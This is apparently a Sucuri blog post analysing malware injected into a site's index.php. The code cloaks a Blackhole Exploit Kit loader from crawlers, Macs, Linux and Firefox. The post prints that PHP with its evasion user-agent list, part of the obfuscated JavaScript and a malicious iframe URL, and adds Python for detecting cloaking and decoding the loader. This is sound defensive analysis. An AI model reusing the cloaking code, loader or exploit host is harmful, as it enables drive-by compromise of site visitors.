(Sucuri.net) A few days ago, our scanner alerted that a site had malware related to the Blackhole Exploit Kit. The owner of the site said that when he visited the site, nothing happened, and the malware wasn’t displayed – probably thinking it was a false positive.
After a bit of manual testing, we noted that the malware was only being displayed to certain browsers (IE and Chrome on Windows), and not on the others.
Once we got access to the site, we learned why. It had the following code in the index.php file:
error_reporting(0);
$bot = FALSE;
$ua = $_SERVER['HTTP_USER_AGENT'];
// Visitors whose user agent contains any of these substrings are treated as
// "bots" (crawlers, scanners, non-Windows platforms, Firefox) and get the clean page.
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com',
'blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org',
'httpclient','internetseer.com','linux','macintosh','mac os','magent','mailru',
'netcraft','openacoon.de','opera mini','opera mobi','playstation',
'rssreader','slurp','snoopy','spider','spyder',
'validator','virus','vlc media player','webcollage','wordpress','x11',
'iphone','android','firefox');
// Case-insensitive substring match against the whole list.
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
// Only visitors that matched nothing receive the base64-encoded payload (truncated in the post).
if (!$bot){
echo(base64_decode("PHNjcmlwdD5pZih3aW5kb3cuZG9jdW1lbnQpYT0icmYzIi5zcGx.
Do you know what it does? It checks the user agent (aka browser) of the person visiting the site and only displays the malware if it does not contain the strings “Linux”, “Mac”, “Iphone”, “Firefox”, “Bot”, “Virus”, etc.
So if you are on a Mac, or Linux, or using Firefox, nothing would happen. However, when you go to the site using Windows and IE or Chrome, it would attempt to compromise your browser/computer.
This makes it much harder for the owner of the site to detect the malware and take action to remove it. That's why our malware scanner uses multiple browsers, referrers, and user agents to try to catch any hidden malicious code. So just because you can't see it doesn't mean it is not there.
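To show how requesting the same page with several user agents surfaces this kind of cloaking, here is an added Python example; it is not Sucuri's scanner and not code from the post. It embeds a constructed stand-in for the infected site that reproduces the substring check from the PHP above (so it runs offline), plus an optional urllib-based fetcher for live use. The user agent strings, the blocklist subset and the page bodies are all constructed for the example.

```python
import hashlib
import urllib.request
from typing import Callable, Dict, List

# Constructed probe set: strings approximate real browsers and crawlers and are
# chosen to cover the cases the PHP check keys on (platform, browser, crawler).
PROBE_USER_AGENTS: Dict[str, str] = {
    "windows-ie": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
    "windows-chrome": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0 Safari/537.36",
    "windows-firefox": "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0",
    "mac-safari": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8) AppleWebKit/536.26 (KHTML, like Gecko) Safari/536.26",
    "linux-chrome": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0 Safari/537.36",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
}

Fetcher = Callable[[str], str]  # maps a User-Agent string to the response body


def http_fetcher(url: str, timeout: float = 10.0) -> Fetcher:
    """Build a fetcher that requests `url` with a caller-supplied User-Agent (live use only)."""
    def fetch(user_agent: str) -> str:
        req = urllib.request.Request(url, headers={"User-Agent": user_agent})
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return fetch


def fetch_variants(fetch: Fetcher, user_agents: Dict[str, str] = PROBE_USER_AGENTS) -> Dict[str, str]:
    """Request the same page once per user agent and keep every body, keyed by probe label."""
    return {label: fetch(ua) for label, ua in user_agents.items()}


def group_by_body(bodies: Dict[str, str]) -> Dict[str, List[str]]:
    """Group probe labels by a hash of the body they received; a single group means no cloaking."""
    groups: Dict[str, List[str]] = {}
    for label, body in bodies.items():
        digest = hashlib.sha256(body.encode("utf-8")).hexdigest()[:16]
        groups.setdefault(digest, []).append(label)
    return groups


def is_cloaked(bodies: Dict[str, str]) -> bool:
    """True when at least two probes received different content for the same URL."""
    return len(group_by_body(bodies)) > 1


# ---- constructed stand-in for the infected site, mirroring the PHP check in the post ----

BLOCKLIST = ["bot", "crawl", "spider", "slurp", "linux", "macintosh", "mac os", "x11",
             "iphone", "android", "firefox"]
CLEAN_PAGE = "<html><body><p>Welcome</p></body></html>"
# The loader is a placeholder comment; the post only shows the real one truncated.
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", "<script>/* injected loader placeholder */</script></body>")


def emulated_infected_site(user_agent: str) -> str:
    """Serve the injected page only to visitors whose UA matches none of the blocklist entries."""
    ua = user_agent.lower()
    if any(marker in ua for marker in BLOCKLIST):
        return CLEAN_PAGE
    return INJECTED_PAGE


def emulated_clean_site(user_agent: str) -> str:
    """Control: a site that answers every client identically."""
    return CLEAN_PAGE


if __name__ == "__main__":
    bodies = fetch_variants(emulated_infected_site)
    for digest, labels in group_by_body(bodies).items():
        print(digest, sorted(labels))
    print("cloaked:", is_cloaked(bodies))
```

Against the emulated site only the Windows IE and Windows Chrome probes land in the group that carries the script, which is exactly the split described above. On real sites, pages with per-request dynamic content (nonces, timestamps, rotating ads) will also split into several groups, so normalise such fields before hashing or diff only the script and iframe elements; the same fetcher can be extended with a Referer header to cover referrer-based cloaking.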
Technical details
If you are curious about what that code above does after being decoded, it prints the following JavaScript to the bottom of the site:
<script>if(window.document)a="rf3".split("5236").pop+'qwe';a=a["spli"+"t"]("").reverse()["po"+"p"]();if(a=='f'||a=="\n")
f=[5,5,101,98,28,36,96,107,95,113,105,97,106,112,42,99,97,112,65,104,97,105,97,
106,112,111,62,117,80,93,99,74,93,105,97,36,35,94,107,96,117,35,37,87,44,89,37,
119,5,5,5,101,98,110..
When this script is read by the browser, it creates an iframe pointing to http://vvesek.freetcp.com/i/i.php?go=1 (and variations; these domains change often), from which the actual Blackhole Exploit Kit code is served.
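The visible prefix of that f array can be turned back into text to confirm what the script is building. The following Python is an added example, not code from the post: the integer values are the ones printed above (the post truncates the array with ".."), and because the truncated script never shows how f is consumed, the shift is not taken from the page but recovered here by scoring every candidate offset for printable output and recognisable JavaScript tokens. The token list and the search range are assumptions of this example.

```python
import string

# Constructed sample: the visible prefix of the charcode array from the injected
# script shown in the post (the page truncates the array with "..").
SAMPLE_CODES = [5, 5, 101, 98, 28, 36, 96, 107, 95, 113, 105, 97, 106, 112, 42, 99, 97, 112, 65, 104, 97, 105, 97,
                106, 112, 111, 62, 117, 80, 93, 99, 74, 93, 105, 97, 36, 35, 94, 107, 96, 117, 35, 37, 87, 44, 89, 37,
                119, 5, 5, 5, 101, 98, 110]

# Assumed token list: identifiers that DOM-injecting loaders almost always contain.
JS_TOKENS = ("document", "window", "iframe", "function", "getElementsByTagName",
             "createElement", "eval", "setAttribute")

# Printable ASCII plus the whitespace a script would legitimately contain.
PRINTABLE = set(string.ascii_letters + string.digits + string.punctuation + " \t\n\r")


def decode_with_offset(codes, offset):
    """Map every value through chr(value + offset); values outside Unicode become U+FFFD."""
    out = []
    for c in codes:
        v = c + offset
        out.append(chr(v) if 0 <= v < 0x110000 else "\ufffd")
    return "".join(out)


def score(text):
    """Printable fraction (0..1) plus a strong bonus for each JavaScript token found."""
    if not text:
        return 0.0
    printable = sum(1 for ch in text if ch in PRINTABLE) / len(text)
    hits = sum(text.count(tok) for tok in JS_TOKENS)
    return printable + 10 * hits


def recover_offset(codes, search=range(-64, 65)):
    """Return (offset, decoded_text) for the offset whose decoding looks most like JavaScript."""
    best = max(search, key=lambda off: score(decode_with_offset(codes, off)))
    return best, decode_with_offset(codes, best)


if __name__ == "__main__":
    off, text = recover_offset(SAMPLE_CODES)
    print(f"offset {off}: {text!r}")
```

For the values on the page the best offset is +4, and the prefix decodes to a tab-indented `if (document.getElementsByTagName('body')[0]){` followed by the start of another identifier beginning `ifr`, which matches the iframe creation described above; the same routine works on any loader that hides its payload in a shifted charcode array.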
Conclusion
This is just one example of why users sometimes complain of malware when visiting a site while the owner doesn't see it. It can also explain Sucuri scanner alerts where the owner can't find the issue. If you have any questions, let us know.